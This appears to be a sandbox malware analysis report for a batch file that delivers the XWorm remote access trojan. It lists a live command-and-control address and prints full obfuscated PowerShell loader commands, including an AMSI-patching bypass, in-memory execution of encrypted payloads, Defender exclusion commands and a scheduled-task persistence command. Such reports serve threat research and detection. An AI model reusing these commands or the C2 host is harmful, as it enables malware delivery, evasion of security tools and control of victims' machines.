Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

08/11/2024, 01:30

241108-bw3dmascml 10

08/11/2024, 01:28

241108-bvq9za1ncx 10

Analysis

  • max time kernel
    210s
  • max time network
    202s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08/11/2024, 01:28

General

  • Target

    Start.bat

  • Size

    492KB

  • MD5

    334e5ed791deb37c6838e954fda616d9

  • SHA1

    45519a533eedb9a5489b219069725ee884d6a662

  • SHA256

    996e11e2c1ddbb5a16743fafa288e5f554cf31a295b5ff8e705af30fb690ef31

  • SHA512

    88bdeb6930b66a1b86264519441207c81955183dfb5ba58705aaf9fbc2fe258dc8f13b23424596d711090380834a1354a549443d08c31b925b7a0ee9204818fc

  • SSDEEP

    12288:TV1R5Ja3/QZfusZK3VX+1VbQLGwCvn0YGZdRksyp:jtoQ5ZGpIDwCvn0YQRkvp

Malware Config

Extracted

Family

xworm

C2

here-thinking.gl.at.ply.gg:50161

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    WindowsSecurity.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 6 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 11 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:632
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:476
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{df8cacc5-89cf-4d22-92ee-bd68ce906a46}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1120
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:688
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:984
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:352
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:1048
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:1060
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1180
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1240
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zErkDrzNflwM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YgdJQWmZRSRwqf,[Parameter(Position=1)][Type]$zRHTWjDnRq)$rMFdIlsJeqw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Mem'+[Char](111)+'r'+'y'+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+'T'+''+[Char](121)+'pe',''+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+''+','+''+'P'+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+',A'+[Char](117)+''+[Char](116)+'o'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$rMFdIlsJeqw.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+'a'+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+'id'+[Char](101)+''+'B'+''+[Char](121)+'Si'+[Char](103)+',P'+[Char](117)+'b'+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$YgdJQWmZRSRwqf).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+'Ma'+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');$rMFdIlsJeqw.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'yS'+[Char](105)+'g,N'+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$zRHTWjDnRq,$YgdJQWmZRSRwqf).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $rMFdIlsJeqw.CreateType();}$IKDMSZpGwdjlN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+'d'+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+'t'+'.'+''+'W'+'in32'+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+'t'+'iv'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+'o'+'d'+''+'s'+'');$MOlWFZxaevkjfc=$IKDMSZpGwdjlN.GetMethod(''+'G'+''+'e'+''+'t'+''+'P'+'ro'+'c'+''+[Char](65)+'d'+'d'+'r'+'e'+'ss',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RBiaFOqtfMXsdlNenKZ=zErkDrzNflwM @([String])([IntPtr]);$SBMdGsOtGbEpDrIKvkxntZ=zErkDrzNflwM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZdHFKzbpVJi=$IKDMSZpGwdjlN.GetMethod('G'+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'eH'+'a'+''+[Char](110)+''+'d'+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rn'+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.dl'+[Char](108)+'')));$BVZXSaAzVOpFQX=$MOlWFZxaevkjfc.Invoke($Null,@([Object]$ZdHFKzbpVJi,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+'a'+''+'r'+'y'+'A'+'')));$bEikUFLPTqFOEmrTx=$MOlWFZxaevkjfc.Invoke($Null,@([Object]$ZdHFKzbpVJi,[Object](''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+'al'+[Char](80)+''+[Char](114)+''+'o'+''+'t'+'e'+[Char](99)+'t')));$XjuyzcR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BVZXSaAzVOpFQX,$RBiaFOqtfMXsdlNenKZ).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+'ll');$mGBiirXMpVzhUsTYR=$MOlWFZxaevkjfc.Invoke($Null,@([Object]$XjuyzcR,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+'B'+'u'+''+[Char](102)+'f'+[Char](101)+'r')));$AzMXsBPCet=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bEikUFLPTqFOEmrTx,$SBMdGsOtGbEpDrIKvkxntZ).Invoke($mGBiirXMpVzhUsTYR,[uint32]8,4,[ref]$AzMXsBPCet);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mGBiirXMpVzhUsTYR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bEikUFLPTqFOEmrTx,$SBMdGsOtGbEpDrIKvkxntZ).Invoke($mGBiirXMpVzhUsTYR,[uint32]8,0x20,[ref]$AzMXsBPCet);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+'st'+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1192
                      • C:\Users\Admin\AppData\Local\WindowsSecurity.exe
                        C:\Users\Admin\AppData\Local\WindowsSecurity.exe
                        2⤵
                        • Executes dropped EXE
                        PID:1724
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:4444
                        • C:\Users\Admin\AppData\Local\WindowsSecurity.exe
                          C:\Users\Admin\AppData\Local\WindowsSecurity.exe
                          2⤵
                          • Executes dropped EXE
                          PID:6228
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:6452
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1264
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1336
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1384
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1516
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:940
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                    1⤵
                                    • Indicator Removal: Clear Windows Event Logs
                                    PID:1540
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1616
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1628
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1716
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1740
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1788
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1864
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                1⤵
                                                  PID:1896
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1940
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1960
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2028
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1816
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2100
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2252
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k NetworkService -p
                                                            1⤵
                                                            • Modifies data under HKEY_USERS
                                                            • Modifies registry class
                                                            PID:2444
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2464
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2492
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                1⤵
                                                                  PID:2584
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2592
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2616
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2628
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2644
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2652
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:684
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:2716
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:3336
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Start.bat"
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3756
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  3⤵
                                                                                    PID:4660
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net file
                                                                                    3⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3328
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 file
                                                                                      4⤵
                                                                                        PID:3920
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6Qr7qHDKJjMpmgIjSPfD44cTPtNyBSLGu8hDw8CfoaU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g7PbVoDhe/kTO9wMHyLfTA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lnXbU=New-Object System.IO.MemoryStream(,$param_var); $serAy=New-Object System.IO.MemoryStream; $mBSQd=New-Object System.IO.Compression.GZipStream($lnXbU, [IO.Compression.CompressionMode]::Decompress); $mBSQd.CopyTo($serAy); $mBSQd.Dispose(); $lnXbU.Dispose(); $serAy.Dispose(); $serAy.ToArray();}function execute_function($param_var,$param2_var){ $DMigp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vmAAk=$DMigp.EntryPoint; $vmAAk.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Start.bat';$sKPoD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Start.bat').Split([Environment]::NewLine);foreach ($cbgZM in $sKPoD) { if ($cbgZM.StartsWith(':: ')) { $HzSkD=$cbgZM.Substring(3); break; }}$payloads_var=[string[]]$HzSkD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                      3⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Drops startup file
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1976
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5100
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1484
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:4636
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1728
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:1888
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\WindowsSecurity.exe'
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:1224
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:2456
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSecurity.exe'
                                                                                              4⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:1420
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                5⤵
                                                                                                  PID:3448
                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSecurity" /tr "C:\Users\Admin\AppData\Local\WindowsSecurity.exe"
                                                                                                4⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:5048
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:2436
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                              2⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Enumerates system info in registry
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of SendNotifyMessage
                                                                                              PID:3192
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcfc20cc40,0x7ffcfc20cc4c,0x7ffcfc20cc58
                                                                                                3⤵
                                                                                                  PID:1448
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1816 /prefetch:2
                                                                                                  3⤵
                                                                                                    PID:3708
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2064,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1932 /prefetch:3
                                                                                                    3⤵
                                                                                                      PID:556
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2180 /prefetch:8
                                                                                                      3⤵
                                                                                                        PID:2288
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1
                                                                                                        3⤵
                                                                                                          PID:4820
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1
                                                                                                          3⤵
                                                                                                            PID:3528
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4432 /prefetch:1
                                                                                                            3⤵
                                                                                                              PID:760
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3572,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3564 /prefetch:8
                                                                                                              3⤵
                                                                                                                PID:2440
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3528,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4684 /prefetch:8
